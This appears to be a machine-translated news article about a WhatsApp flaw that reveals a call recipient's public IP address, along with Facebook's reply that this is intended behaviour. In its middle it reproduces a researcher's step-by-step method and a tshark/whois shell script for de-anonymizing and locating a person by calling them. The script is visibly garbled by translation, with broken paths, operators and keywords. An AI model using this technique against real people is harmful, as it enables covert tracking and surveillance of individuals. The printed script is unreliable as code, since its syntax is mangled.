The latest version of the WhatsApp messaging service is vulnerable to the disclosure of the user's public IP remotely, and this has been proven to happen on all platforms.
How is this? It has been observed that during a WhatsApp call (both voice and video), the caller's application tries to establish a direct connection with the public IP address of the recipient's device.
As user bhdresh has posted on GitHub, by filtering the IP addresses of the Facebook and WhatsApp servers of the target hosts, it is possible to reveal the correct public IP address of the target WhatsApp user without their knowledge.
The consequences of these leaks
The possibility of mapping WhatsApp users with their public IP will not only reveal the location information of the users of this app but can also be misused to track their physical movement while maintaining the location history, according to the user who has discovered this violation.
"This direct mapping between user information and IP can also be misused to track users' browsing habits and influence them," according to the literal words of bhdresh.
This user has shown in Github the command to exploit this vulnerability but warns that "this program is only for educational purposes" and asks that it not be used without permission and that if someone causes any damage with this program, the author or any Internet provider they have no responsibility.
Steps to exploit this vulnerability
According to the user who reports this vulnerability, there are 7 steps to exploit it. First you have to start the WiFi access point on the attacker's machine and connect the phone to the attacker's SSID . After this, you have to start a script on the attacker's machine that now acts as a router for the attacker's phone. The script would be the following:
/ bin / sh
filter = tshark
-i eth0 -T fields -f "udp" -e ip.dst -Y "ip.dst! = 192.168.0.0 / 16 and ip.dst! = 10.0.0 / 8 and ip.dst! = 172.16.0.0 / 12 "-c 100 | sort -u | xargs | sed" s / / and ip.dst! = / G "| sed" s / ^ / ip.dst! = / G "echo "Hit Enter and call your target".
read the line
tshark -i eth0 -l -T fields -f "udp" -e ip.dst -Y "$ filter" -Y "ip.dst! = 192.168.0.0 / 16 and ip.dst! = 10.0.0.0 / 8 and ip.dst! = 172.16.0.0 / 12 "| while read line do whois $ line> / tmp / b
filter =
cat / tmp / b | xargs | egrep -iv "facebook | google" | wc -lif ["$ filter" -gt 0]; then targetinfo = cat / tmp / b | egrep -iw "OrgName: | NetName: | Country:" echo $ line --- $ targetinfo fi done
After this, call any WhatsApp user at random to capture the IP addresses of the server to be filtered and you have to call the "victim" from whom you want to obtain the information. After this, the call is disconnected once established and the script will reveal the public IP address of the target . After this, the last step is to validate the public IP address on the target's phone.
What does Facebook think of this?
In October 2020 this vulnerability was reported to Facebook. The response from WhatsApp's parent company was: "Thank you for your report. In this case, the issue you described is actually only intended functionality and therefore not eligible for a reward ." That is, for the rewards given to those who find security flaws in their products.
Some time later, to another question from bhdresh, Facebook added that "due to the nature of the peer to peer protocol, the best methods for users who may be concerned about accidental disclosure is to take a proactive approach. This may include limiting from calling trusted users or using a VPN ."
The user asked to disclose this information and the Menlo Park firm said that the decision was his own and that there would be no penalty for it. The expert proposed to them in March to carry out a practice similar to signal that has a function to relay calls through Signal's server so as not to reveal IP addresses. Anyway, Facebook assured that "at this moment we are happy with our current implementation of WhatsApp calls ."
